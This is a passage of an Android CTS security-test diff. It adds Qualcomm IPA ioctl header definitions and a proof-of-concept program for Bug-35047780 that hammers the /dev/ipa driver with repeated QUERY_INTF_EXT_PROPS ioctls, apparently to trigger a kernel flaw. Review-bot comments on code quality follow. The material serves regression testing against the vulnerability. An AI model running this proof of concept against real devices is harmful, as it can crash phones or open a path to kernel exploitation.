+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_mdfy - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @flt_rule_hdl: handle to rule
+ * @status: output parameter, status of filtering rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_mdfy {
+ struct ipa_flt_rule rule;
+ uint32_t rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_flt_rule - filtering rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_flt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_del - filtering rule descriptor includes
+ * in and out parameters
+ *
+ * @hdl: handle returned from filtering rule add operation
+ * @status: output parameter, status of filtering rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_flt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_flt_rule - filtering rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_flt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl - routing table lookup parameters, if lookup was
+ * successful caller must call put to release the reference
+ * count when done
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @htl: output parameter, handle of routing table, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_ioc_query_intf - used to lookup number of tx and
+ * rx properties of interface
+ * @name: name of interface
+ * @num_tx_props: output parameter, number of tx properties
+ * valid only when ioctl return val is non-negative
+ * @num_rx_props: output parameter, number of rx properties
+ * valid only when ioctl return val is non-negative
+ * @num_ext_props: output parameter, number of ext properties
+ * valid only when ioctl return val is non-negative
+ * @excp_pipe: exception packets of this interface should be
+ * routed to this pipe
+ */
+struct ipa_ioc_query_intf {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ uint32_t num_rx_props;
+ uint32_t num_ext_props;
+ enum ipa_client_type excp_pipe;
+};
+
+/**
+ * struct ipa_ioc_tx_intf_prop - interface tx property
+ * @ip: IP family of routing rule
+ * @attrib: routing rule
+ * @dst_pipe: routing output pipe
+ * @alt_dst_pipe: alternate routing output pipe
+ * @hdr_name: name of associated header if any, empty string when no header
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_tx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type dst_pipe;
+ enum ipa_client_type alt_dst_pipe;
+ char hdr_name[IPA_RESOURCE_NAME_MAX];
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_tx_props - interface tx propertie
+ * @name: name of interface
+ * @num_tx_props: number of TX properties
+ * @tx[0]: output parameter, the tx properties go here back to back
+ */
+struct ipa_ioc_query_intf_tx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[0];
+};
+
+/**
+ * struct ipa_ioc_ext_intf_prop - interface extended property
+ * @ip: IP family of routing rule
+ * @eq_attrib: attributes of the rule in equation form
+ * @action: action field
+ * @rt_tbl_idx: index of RT table referred to by filter rule
+ * @mux_id: MUX_ID
+ * @filter_hdl: handle of filter (as specified by provider of filter rule)
+ * @is_xlat_rule: it is xlat flt rule or not
+ */
+struct ipa_ioc_ext_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_idx;
+ uint8_t mux_id;
+ uint32_t filter_hdl;
+ uint8_t is_xlat_rule;
+ uint32_t rule_id;
+ uint8_t is_rule_hashable;
+};
+
+/**
+ * struct ipa_ioc_query_intf_ext_props - interface ext propertie
+ * @name: name of interface
+ * @num_ext_props: number of EXT properties
+ * @ext[0]: output parameter, the ext properties go here back to back
+ */
+struct ipa_ioc_query_intf_ext_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[0];
+};
+
+/**
+ * struct ipa_ioc_rx_intf_prop - interface rx property
+ * @ip: IP family of filtering rule
+ * @attrib: filtering rule
+ * @src_pipe: input pipe
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_rx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type src_pipe;
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_rx_props - interface rx propertie
+ * @name: name of interface
+ * @num_rx_props: number of RX properties
+ * @rx: output parameter, the rx properties go here back to back
+ */
+struct ipa_ioc_query_intf_rx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[0];
+};
+
+/**
+ * struct ipa_ioc_nat_alloc_mem - nat table memory allocation
+ * properties
+ * @dev_name: input parameter, the name of table
+ * @size: input parameter, size of table in bytes
+ * @offset: output parameter, offset into page in case of system memory
+ */
+struct ipa_ioc_nat_alloc_mem {
+ char dev_name[IPA_RESOURCE_NAME_MAX];
+ size_t size;
+ off_t offset;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_init - nat table initialization
+ * parameters
+ * @tbl_index: input parameter, index of the table
+ * @ipv4_rules_offset: input parameter, ipv4 rules address offset
+ * @expn_rules_offset: input parameter, ipv4 expansion rules address offset
+ * @index_offset: input parameter, index rules offset
+ * @index_expn_offset: input parameter, index expansion rules offset
+ * @table_entries: input parameter, ipv4 rules table size in entries
+ * @expn_table_entries: input parameter, ipv4 expansion rules table size
+ * @ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_init {
+ uint8_t tbl_index;
+ uint32_t ipv4_rules_offset;
+ uint32_t expn_rules_offset;
+
+ uint32_t index_offset;
+ uint32_t index_expn_offset;
+
+ uint16_t table_entries;
+ uint16_t expn_table_entries;
+ uint32_t ip_addr;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_del - nat table delete parameter
+ * @table_index: input parameter, index of the table
+ * @public_ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_del {
+ uint8_t table_index;
+ uint32_t public_ip_addr;
+};
+
+/**
+ * struct ipa_ioc_nat_dma_one - nat dma command parameter
+ * @table_index: input parameter, index of the table
+ * @base_addr: type of table, from which the base address of the table
+ * can be inferred
+ * @offset: destination offset within the NAT table
+ * @data: data to be written.
+ */
+struct ipa_ioc_nat_dma_one {
+ uint8_t table_index;
+ uint8_t base_addr;
+
+ uint32_t offset;
+ uint16_t data;
+
+};
+
+/**
+ * struct ipa_ioc_nat_dma_cmd - To hold multiple nat dma commands
+ * @entries: number of dma commands in use
+ * @dma: data pointer to the dma commands
+ */
+struct ipa_ioc_nat_dma_cmd {
+ uint8_t entries;
+ struct ipa_ioc_nat_dma_one dma[0];
+
+};
+
+/**
+ * struct ipa_msg_meta - Format of the message meta-data.
+ * @msg_type: the type of the message
+ * @rsvd: reserved bits for future use.
+ * @msg_len: the length of the message in bytes
+ *
+ * For push model:
+ * Client in user-space should issue a read on the device (/dev/ipa) with a
+ * sufficiently large buffer in a continuous loop, call will block when there is
+ * no message to read. Upon return, client can read the ipa_msg_meta from start
+ * of buffer to find out type and length of message
+ * size of buffer supplied >= (size of largest message + size of metadata)
+ *
+ * For pull model:
+ * Client in user-space can also issue a pull msg IOCTL to device (/dev/ipa)
+ * with a payload containing space for the ipa_msg_meta and the message specific
+ * payload length.
+ * size of buffer supplied == (len of specific message + size of metadata)
+ */
+struct ipa_msg_meta {
+ uint8_t msg_type;
+ uint8_t rsvd;
+ uint16_t msg_len;
+};
+
+/**
+ * struct ipa_wlan_msg - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @mac_addr: mac address of wlan client
+ *
+ * wlan drivers need to pass name of wlan iface and mac address of
+ * wlan client along with ipa_wlan_event, whenever a wlan client is
+ * connected/disconnected/moved to power save/come out of power save
+ */
+struct ipa_wlan_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+};
+
+/**
+ * enum ipa_wlan_hdr_attrib_type - attribute type
+ * in wlan client header
+ *
+ * WLAN_HDR_ATTRIB_MAC_ADDR: attrib type mac address
+ * WLAN_HDR_ATTRIB_STA_ID: attrib type station id
+ */
+enum ipa_wlan_hdr_attrib_type {
+ WLAN_HDR_ATTRIB_MAC_ADDR,
+ WLAN_HDR_ATTRIB_STA_ID
+};
+
+/**
+ * struct ipa_wlan_hdr_attrib_val - header attribute value
+ * @attrib_type: type of attribute
+ * @offset: offset of attribute within header
+ * @u.mac_addr: mac address
+ * @u.sta_id: station id
+ */
+struct ipa_wlan_hdr_attrib_val {
+ enum ipa_wlan_hdr_attrib_type attrib_type;
+ uint8_t offset;
+ union {
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+ uint8_t sta_id;
+ } u;
+};
+
+/**
+ * struct ipa_wlan_msg_ex - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @num_of_attribs: number of attributes
+ * @attrib_val: holds attribute values
+ *
+ * wlan drivers need to pass name of wlan iface and mac address
+ * of wlan client or station id along with ipa_wlan_event,
+ * whenever a wlan client is connected/disconnected/moved to
+ * power save/come out of power save
+ */
+struct ipa_wlan_msg_ex {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_of_attribs;
+ struct ipa_wlan_hdr_attrib_val attribs[0];
+};
+
+struct ipa_ecm_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ int ifindex;
+};
+
+/**
+ * struct ipa_wan_msg - To hold information about wan client
+ * @name: name of the wan interface
+ *
+ * CnE need to pass the name of default wan iface when connected/disconnected.
+ * netmgr need to pass the name of wan eMBMS iface when connected.
+ */
+struct ipa_wan_msg {
+ char upstream_ifname[IPA_RESOURCE_NAME_MAX];
+ char tethered_ifname[IPA_RESOURCE_NAME_MAX];
+ enum ipa_ip_type ip;
+};
+
+/**
+ * struct ipa_ioc_rm_dependency - parameters for add/delete dependency
+ * @resource_name: name of dependent resource
+ * @depends_on_name: name of its dependency
+ */
+struct ipa_ioc_rm_dependency {
+ enum ipa_rm_resource_name resource_name;
+ enum ipa_rm_resource_name depends_on_name;
+};
+
+struct ipa_ioc_generate_flt_eq {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+};
+
+/**
+ * struct ipa_ioc_write_qmapid - to write mux id to endpoint meta register
+ * @mux_id: mux id of wan
+ */
+struct ipa_ioc_write_qmapid {
+ enum ipa_client_type client;
+ uint8_t qmap_id;
+};
+
+enum ipacm_client_enum {
+ IPACM_CLIENT_USB = 1,
+ IPACM_CLIENT_WLAN,
+ IPACM_CLIENT_MAX
+};
+/**
+ * actual IOCTLs supported by IPA driver
+ */
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR, \
+ struct ipa_ioc_add_hdr *)
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR, \
+ struct ipa_ioc_del_hdr *)
+#define IPA_IOC_ADD_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE, \
+ struct ipa_ioc_add_rt_rule *)
+#define IPA_IOC_ADD_RT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE_AFTER, \
+ struct ipa_ioc_add_rt_rule_after *)
+#define IPA_IOC_DEL_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_RT_RULE, \
+ struct ipa_ioc_del_rt_rule *)
+#define IPA_IOC_ADD_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE, \
+ struct ipa_ioc_add_flt_rule *)
+#define IPA_IOC_ADD_FLT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE_AFTER, \
+ struct ipa_ioc_add_flt_rule_after *)
+#define IPA_IOC_DEL_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_FLT_RULE, \
+ struct ipa_ioc_del_flt_rule *)
+#define IPA_IOC_COMMIT_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_COMMIT_HDR)
+#define IPA_IOC_RESET_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_RESET_HDR)
+#define IPA_IOC_COMMIT_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_COMMIT_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_DUMP _IO(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DUMP)
+#define IPA_IOC_GET_RT_TBL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_RT_TBL, \
+ struct ipa_ioc_get_rt_tbl *)
+#define IPA_IOC_PUT_RT_TBL _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_RT_TBL, \
+ uint32_t)
+#define IPA_IOC_COPY_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COPY_HDR, \
+ struct ipa_ioc_copy_hdr *)
+#define IPA_IOC_QUERY_INTF _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF, \
+ struct ipa_ioc_query_intf *)
+#define IPA_IOC_QUERY_INTF_TX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_TX_PROPS, \
+ struct ipa_ioc_query_intf_tx_props *)
+#define IPA_IOC_QUERY_INTF_RX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_RX_PROPS, \
+ struct ipa_ioc_query_intf_rx_props *)
+#define IPA_IOC_QUERY_INTF_EXT_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_EXT_PROPS, \
+ struct ipa_ioc_query_intf_ext_props *)
+#define IPA_IOC_GET_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HDR, \
+ struct ipa_ioc_get_hdr *)
+#define IPA_IOC_PUT_HDR _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_HDR, \
+ uint32_t)
+#define IPA_IOC_ALLOC_NAT_MEM _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ALLOC_NAT_MEM, \
+ struct ipa_ioc_nat_alloc_mem *)
+#define IPA_IOC_V4_INIT_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_INIT_NAT, \
+ struct ipa_ioc_v4_nat_init *)
+#define IPA_IOC_NAT_DMA _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NAT_DMA, \
+ struct ipa_ioc_nat_dma_cmd *)
+#define IPA_IOC_V4_DEL_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_DEL_NAT, \
+ struct ipa_ioc_v4_nat_del *)
+#define IPA_IOC_GET_NAT_OFFSET _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_NAT_OFFSET, \
+ uint32_t *)
+#define IPA_IOC_SET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_SET_FLT, \
+ uint32_t)
+#define IPA_IOC_PULL_MSG _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PULL_MSG, \
+ struct ipa_msg_meta *)
+#define IPA_IOC_RM_ADD_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_ADD_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_RM_DEL_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_DEL_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_GENERATE_FLT_EQ _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GENERATE_FLT_EQ, \
+ struct ipa_ioc_generate_flt_eq *)
+#define IPA_IOC_QUERY_EP_MAPPING _IOR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_EP_MAPPING, \
+ uint32_t)
+#define IPA_IOC_QUERY_RT_TBL_INDEX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_RT_TBL_INDEX, \
+ struct ipa_ioc_get_rt_tbl_indx *)
+#define IPA_IOC_WRITE_QMAPID _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_WRITE_QMAPID, \
+ struct ipa_ioc_write_qmapid *)
+#define IPA_IOC_MDFY_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_FLT_RULE, \
+ struct ipa_ioc_mdfy_flt_rule *)
+#define IPA_IOC_MDFY_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_RT_RULE, \
+ struct ipa_ioc_mdfy_rt_rule *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_ADD _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD, \
+ struct ipa_wan_msg *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_DEL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_NOTIFY_WAN_EMBMS_CONNECTED _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_ADD_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR_PROC_CTX, \
+ struct ipa_ioc_add_hdr_proc_ctx *)
+#define IPA_IOC_DEL_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR_PROC_CTX, \
+ struct ipa_ioc_del_hdr_proc_ctx *)
+
+#define IPA_IOC_GET_HW_VERSION _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HW_VERSION, \
+ enum ipa_hw_type *)
+
+/*
+ * unique magic number of the Tethering bridge ioctls
+ */
+#define TETH_BRIDGE_IOC_MAGIC 0xCE
+
+/*
+ * Ioctls supported by Tethering bridge driver
+ */
+#define TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE 0
+#define TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS 1
+#define TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS 2
+#define TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES 3
+#define TETH_BRIDGE_IOCTL_MAX 4
+
+
+/**
+ * enum teth_link_protocol_type - link protocol (IP / Ethernet)
+ */
+enum teth_link_protocol_type {
+ TETH_LINK_PROTOCOL_IP,
+ TETH_LINK_PROTOCOL_ETHERNET,
+ TETH_LINK_PROTOCOL_MAX,
+};
+
+/**
+ * enum teth_aggr_protocol_type - Aggregation protocol (MBIM / TLP)
+ */
+enum teth_aggr_protocol_type {
+ TETH_AGGR_PROTOCOL_NONE,
+ TETH_AGGR_PROTOCOL_MBIM,
+ TETH_AGGR_PROTOCOL_TLP,
+ TETH_AGGR_PROTOCOL_MAX,
+};
+
+/**
+ * struct teth_aggr_params_link - Aggregation parameters for uplink/downlink
+ * @aggr_prot: Aggregation protocol (MBIM / TLP)
+ * @max_transfer_size_byte: Maximal size of aggregated packet in bytes.
+ * Default value is 16*1024.
+ * @max_datagrams: Maximal number of IP packets in an aggregated
+ * packet. Default value is 16
+ */
+struct teth_aggr_params_link {
+ enum teth_aggr_protocol_type aggr_prot;
+ uint32_t max_transfer_size_byte;
+ uint32_t max_datagrams;
+};
+
+
+/**
+ * struct teth_aggr_params - Aggregation parmeters
+ * @ul: Uplink parameters
+ * @dl: Downlink parmaeters
+ */
+struct teth_aggr_params {
+ struct teth_aggr_params_link ul;
+ struct teth_aggr_params_link dl;
+};
+
+/**
+ * struct teth_aggr_capabilities - Aggregation capabilities
+ * @num_protocols: Number of protocols described in the array
+ * @prot_caps[]: Array of aggregation capabilities per protocol
+ */
+struct teth_aggr_capabilities {
+ uint16_t num_protocols;
+ struct teth_aggr_params_link prot_caps[0];
+};
+
+/**
+ * struct teth_ioc_set_bridge_mode
+ * @link_protocol: link protocol (IP / Ethernet)
+ * @lcid: logical channel number
+ */
+struct teth_ioc_set_bridge_mode {
+ enum teth_link_protocol_type link_protocol;
+ uint16_t lcid;
+};
+
+/**
+ * struct teth_ioc_set_aggr_params
+ * @aggr_params: Aggregation parmeters
+ * @lcid: logical channel number
+ */
+struct teth_ioc_aggr_params {
+ struct teth_aggr_params aggr_params;
+ uint16_t lcid;
+};
+
+
+#define TETH_BRIDGE_IOC_SET_BRIDGE_MODE _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE, \
+ struct teth_ioc_set_bridge_mode *)
+#define TETH_BRIDGE_IOC_SET_AGGR_PARAMS _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_PARAMS _IOR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_CAPABILITIES _IOWR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES, \
+ struct teth_aggr_capabilities *)
+
+/*
+ * unique magic number of the ODU bridge ioctls
+ */
+#define ODU_BRIDGE_IOC_MAGIC 0xCD
+
+/*
+ * Ioctls supported by ODU bridge driver
+ */
+#define ODU_BRIDGE_IOCTL_SET_MODE 0
+#define ODU_BRIDGE_IOCTL_SET_LLV6_ADDR 1
+#define ODU_BRIDGE_IOCTL_MAX 2
+
+/**
+ * enum odu_bridge_mode - bridge mode
+ * (ROUTER MODE / BRIDGE MODE)
+ */
+enum odu_bridge_mode {
+ ODU_BRIDGE_MODE_ROUTER,
+ ODU_BRIDGE_MODE_BRIDGE,
+ ODU_BRIDGE_MODE_MAX,
+};
+
+#define ODU_BRIDGE_IOC_SET_MODE _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_MODE, \
+ enum odu_bridge_mode)
+
+#define ODU_BRIDGE_IOC_SET_LLV6_ADDR _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_LLV6_ADDR, \
+ struct in6_addr *)
+
+#endif /* _UAPI_MSM_IPA_H_ */
diff --git a/hostsidetests/security/securityPatch/Bug-35047780/poc.cpp b/hostsidetests/security/securityPatch/Bug-35047780/poc.cpp
new file mode 100644
index 0000000..f036943
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047780/poc.cpp
@@ -0,0 +1,65 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions
+ * and limitations under the License.
+ **/
+
+
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include "local_poc.h"
+#include <unistd.h>
+#include <stdio.h>
+
+struct ipa_ioc_query_intf_ext_props_2 {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[23];
+};
+
+int main() {
+
+ int fd = open("/dev/ipa", O_RDWR);
+
+ struct ipa_ioc_query_intf query_intf;
+ strlcpy(&(query_intf.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+
+ int result = ioctl(fd, IPA_IOC_QUERY_INTF, &query_intf);
+
+ ipa_ioc_query_intf_ext_props_2 ext_props_2;
+ memset(&ext_props_2, 0, sizeof(ext_props_2));
+ strlcpy(&(ext_props_2.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ ext_props_2.num_ext_props = 23;
+
+ int result2 = ioctl(fd, IPA_IOC_QUERY_INTF_EXT_PROPS, &ext_props_2);
+
+ while (true) {
+ ipa_ioc_query_intf_ext_props ext_props;
+ memset(&ext_props, 0, sizeof(ext_props));
+ strlcpy(&(ext_props.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ ext_props.num_ext_props = 0;
+
+ int result3 = ioctl(fd, IPA_IOC_QUERY_INTF_EXT_PROPS, &ext_props);
+ usleep(10000);
+ }
+ return 0;
+}
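Review bot: The descriptor from `open("/dev/ipa", O_RDWR)` in `main` is never checked, so on a device without that node every later ioctl is issued on -1 and the `while (true)` loop keeps running until something outside the process ends it. A guard such as `if (fd < 0) return 0;` directly after the open would make that case exit cleanly; the exit status the host-side test expects is not visible in this hunk, so confirm the value. `query_intf` is passed to `IPA_IOC_QUERY_INTF` with only `name` written, unlike the two later structs, and `memset(&query_intf, 0, sizeof(query_intf));` before the first `strlcpy` would keep uninitialised stack bytes out of that call. `result`, `result2` and `result3` are never read and `return 0;` after the loop is unreachable, so a short comment above the loop saying how the test decides pass or fail (for example, the host side watching for a device crash within a timeout) would help the next maintainer.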
diff --git a/hostsidetests/security/securityPatch/Bug-35048450/Android.mk b/hostsidetests/security/securityPatch/Bug-35048450/Android.mk
new file mode 100644
index 0000000..ea9dd89
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35048450/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35048450
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
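Review bot: The four `CFLAGS +=` lines and `LDFLAGS += -rdynamic` set variables that the Android.mk module rules do not appear to consume, since only the `LOCAL_`-prefixed forms are read per module. As a result `-Wall`, `-D_FORTIFY_SOURCE=2`, `-Iinclude` and `-fPIE` most likely never reach the compiler for this test binary. Writing them as `LOCAL_CFLAGS += ...` and `LOCAL_LDFLAGS += -rdynamic` would match the existing `LOCAL_LDFLAGS += -fPIE -pie` line. Several of the warnings (`-Wstrict-prototypes`, `-Wmissing-prototypes`, `-Wnested-externs`, `-Wdeclaration-after-statement`) are C-only while `LOCAL_SRC_FILES` is `poc.cpp`, so they can be dropped when the flags are moved.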
diff --git a/hostsidetests/security/securityPatch/Bug-35048450/local_poc.h b/hostsidetests/security/securityPatch/Bug-35048450/local_poc.h
